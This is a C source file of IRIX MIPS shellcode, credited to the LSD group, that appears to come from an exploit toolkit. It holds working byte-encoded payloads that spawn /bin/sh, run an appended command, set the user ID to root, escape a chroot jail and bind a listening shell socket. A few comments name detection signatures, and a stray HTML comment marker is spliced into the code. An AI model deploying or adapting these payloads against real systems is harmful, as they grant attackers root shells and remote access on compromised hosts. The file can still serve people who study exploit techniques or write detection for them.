/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland        *://lsd-pl.net/ #*/
/*## asmcodes for irix 5.3 6.2 6.3 6.4 6.5 6.5.10 mips                       #*/

/*
syscall     %v0  %a0,%a1,%a2,%a3
----------- ---- ---------------------------------------------------------------
execv       x3f3 ->path="/bin/sh",->[->a0=path,0]
execv       x3f3 ->path="/bin/sh",->[->a0=path,->a1="-c",->a2=cmd,0]
getuid      x400  
setreuid    x464 ruid,euid=0
mkdir       x438 ->path="a..",mode=(any value is accepted)
chroot      x425 ->path={"a..","."}
chdir       x3f4 ->path=".."
getpeername x445 sfd,->sadr=[],->[len=605028752]
socket      x453 AF_INET=2,SOCK_STREAM=2,prot=0
bind        x442 sfd,->sadr=[0x30,2,hi,lo,0,0,0,0],len=0x10
listen      x448 sfd,backlog=5
accept      x441 sfd,0,0
close       x3ee fd={0,1,2}
dup         x411 sfd
*/

#if defined(MIPS) && defined(IRIX)

/*
 * execv("/bin/sh", {"/bin/sh", NULL}) via syscall 0x3f3 (see the table
 * above).  Position independent: bltzal $zero never branches (rs is 0) but
 * still loads $ra with the address two words past itself, and every later
 * address is formed relative to that $ra.  sb writes the NUL that terminates
 * "/bin/sh" (byte 43); the two sw build argv directly after it (bytes
 * 44..51), i.e. the routine writes past the end of this array, so the memory
 * it runs from must be writable.  Offsets in the per-line comments are
 * decimal, taken from the 16-bit two's-complement immediate of each word.
 * The syscall word \x03\xff\xff\xcc recurs in every routine of this file
 * and is a convenient byte-level indicator when scanning for this code.
 */
char shellcode[]=          /* 9*4+7 bytes                    */
    "\x04\x10\xff\xff"     /* bltzal  $zero,<shellcode>      */
    "\x24\x02\x03\xf3"     /* li      $v0,1011               */
    "\x23\xff\x01\x14"     /* addi    $ra,$ra,276            */
    "\x23\xe4\xff\x08"     /* addi    $a0,$ra,-248           */
    "\x23\xe5\xff\x10"     /* addi    $a1,$ra,-240 (0xff10)  */
    "\xaf\xe4\xff\x10"     /* sw      $a0,-240($ra) (0xff10) */
    "\xaf\xe0\xff\x14"     /* sw      $zero,-236($ra)        */
    "\xa3\xe0\xff\x0f"     /* sb      $zero,-241($ra)        */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "/bin/sh"
;

/*
 * execv("/bin/sh", {"/bin/sh", "-c", cmd, NULL}) via syscall 0x3f3.  The
 * command text is expected to be appended by the caller right after the
 * trailing literal (byte 68 onward; the "command" placeholder below).  The
 * two sb instructions drop NULs at bytes 63 and 66, splitting the literal
 * into "/bin/sh" and "-c".  argv is assembled at $ra-1244 = byte 1052 from
 * the start of the array, far beyond the fixed part, so whatever buffer
 * this runs from must be writable at least that far -- TODO confirm the
 * caller sizes it accordingly.
 */
char cmdshellcode[]=       /* 14*4+12+cmdlen bytes           */
    "\x04\x10\xff\xff"     /* bltzal  $zero,<cmdshellcode>   */
    "\x24\x02\x03\xf3"     /* li      $v0,1011               */
    "\x23\xff\x08\xf0"     /* addi    $ra,$ra,2288           */
    "\x23\xe4\xf7\x40"     /* addi    $a0,$ra,-2240          */
    "\x23\xe5\xfb\x24"     /* addi    $a1,$ra,-1244          */
    "\xaf\xe4\xfb\x24"     /* sw      $a0,-1244($ra)         */
    "\x23\xe6\xf7\x48"     /* addi    $a2,$ra,-2232          */
    "\xaf\xe6\xfb\x28"     /* sw      $a2,-1240($ra)         */
    "\x23\xe6\xf7\x4c"     /* addi    $a2,$ra,-2228          */
    "\xaf\xe6\xfb\x2c"     /* sw      $a2,-1236($ra)         */
    "\xaf\xe0\xfb\x30"     /* sw      $zero,-1232($ra)       */
    "\xa3\xe0\xf7\x47"     /* sb      $zero,-2233($ra)       */
    "\xa3\xe0\xf7\x4a"     /* sb      $zero,-2230($ra)       */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "/bin/sh -c  "
    /* command (appended by the caller, NUL-terminated)   */
;

/*
 * getuid() followed by setreuid(getuid() & 0xffff, 0) -- syscalls 0x400 and
 * 0x464 from the table above.  The getuid number is produced as 1025-1
 * because a direct li of 0x0400 would put a zero byte in the immediate.
 * Note the andi truncates both arguments to 16 bits; a real uid above
 * 65535 would be passed incorrectly.  Contains no data bytes and no
 * position-dependent addressing, so it can be prepended to any of the
 * other routines unchanged.
 */
char setreuidcode[]=       /* 7*4 bytes                      */
    "\x24\x02\x04\x01"     /* li      $v0,1024+1             */
    "\x20\x42\xff\xff"     /* addi    $v0,$v0,-1             */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x30\x44\xff\xff"     /* andi    $a0,$v0,0xffff         */
    "\x30\x05\xff\xff"     /* andi    $a1,$zero,0xffff       */
    "\x24\x02\x04\x64"     /* li      $v0,1124               */
    "\x03\xff\xff\xcc"     /* syscall                        */
;

/*
 * chroot-escape sequence from the table above: mkdir("a..") (0x438),
 * chroot("a..") (0x425), chdir("..") (0x3f4) repeated 258 times ($s1 counts
 * 257 down to -1), then chroot(".").  The first word is data, "0a..", and
 * the three path arguments point into it at +1 ("a.."), +2 ("..") and +3
 * ("."); when executed it decodes to an andi with no useful effect
 * (0x30612e2e).  The bltzal at +4 leaves $ra = +12, so sw $zero,-8($ra)
 * zeroes the bltzal word itself (already executed) and thereby
 * NUL-terminates "a..": the routine is self-modifying and needs memory
 * that is both writable and executable.  The mkdir/chroot/chdir..
 * /chroot(".") syscall pattern is the classic signature to look for in a
 * syscall trace.
 */
char chrootcode[]=         /* 18*4 bytes                     */
    "\x30\x61.."           /* data    "0a.." (paths)         */
    "\x04\x10\xff\xff"     /* bltzal  $zero,<chrootcode+4>   */
    "\xaf\xe0\xff\xf8"     /* sw      $zero,-8($ra)          */
    "\x23\xe4\xff\xf5"     /* addi    $a0,$ra,-11            */
    "\x24\x02\x04\x38"     /* li      $v0,1080               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x23\xe4\xff\xf5"     /* addi    $a0,$ra,-11            */
    "\x24\x02\x04\x25"     /* li      $v0,1061               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x24\x11\x01\x01"     /* li      $s1,257                */
    "\x23\xe4\xff\xf6"     /* addi    $a0,$ra,-10            */
    "\x24\x02\x03\xf4"     /* li      $v0,1012               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x31\xff\xff"     /* addi    $s1,$s1,-1             */
    "\x06\x21\xff\xfb"     /* bgez    $s1,<chrootcode+40>    */
    "\x23\xe4\xff\xf7"     /* addi    $a0,$ra,-9             */
    "\x24\x02\x04\x25"     /* li      $v0,1061               */
    "\x03\xff\xff\xcc"     /* syscall                        */
;

<!-- -->

char bindsckcode[]=        /* 31*4 bytes                     */
    "\x30\x02\x12\x34"
    "\x04\x10\xff\xff"     /* bltzal  $zero,<bindsckcode+4>  */
    "\x24\x11\x01\xff"     /* li      $s1,511                */
    "\xaf\xe0\xff\xf8"     /* sw      $zero,-8($ra)          */
    "\x22\x24\xfe\x03"     /* addi    $a0,$s1,-509           */
    "\x22\x25\xfe\x03"     /* addi    $a1,$s1,-509           */
    "\x22\x26\xfe\x01"     /* addi    $a2,$s1,-511           */
    "\x24\x02\x04\x53"     /* li      $v0,1107               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x30\x44\xff\xff"     /* andi    $a0,$v0,0xffff         */
    "\x23\xe5\xff\xf4"     /* addi    $a1,$ra,-12            */
    "\x22\x26\xfe\x11"     /* addi    $a2,$s1,-(511-16)      */
    "\x24\x02\x04\x42"     /* li      $v0,1090               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x25\xfe\x06"     /* addi    $a1,$s1,-506           */
    "\x24\x02\x04\x48"     /* li      $v0,1096               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x25\xfe\x01"     /* addi    $a1,$s1,-511           */
    "\x22\x26\xfe\x01"     /* addi    $a2,$s1,-511           */
    "\x24\x02\x04\x41"     /* li      $v0,1089               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x02\x22\x98\x20"     /* add     $s3,$s1,$v0            */
    "\x22\x32\xfe\x03"     /* addi    $s2,$s1,-509           */
    "\x02\x40\x20\x25"     /* move    $a0,$s2                */
    "\x24\x02\x03\xee"     /* li      $v0,1006               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x64\xfe\x01"     /* addi    $a0,$s3,-511           */
    "\x24\x02\x04\x11"     /* li      $v0,1041               */
    "\x03\xff\xff\xcc"     /* syscall                        */
    "\x22\x52\xff\xff"     /* addi    $s2,$s2,-1             */
    "\x06\x41\xff\xf8"     /* bgez    $s2,<bindsckcode+92>   */
;

char jump[]=
    "\x03\xa0\x10\x25"     /* move    $v0,$sp                */
    "\x03\xe0\x00\x08"     /* jr      $ra                    */
;

#define FINDSCKPORTOFS     30
#define BINDSCKPORTOFS     2 

#endif
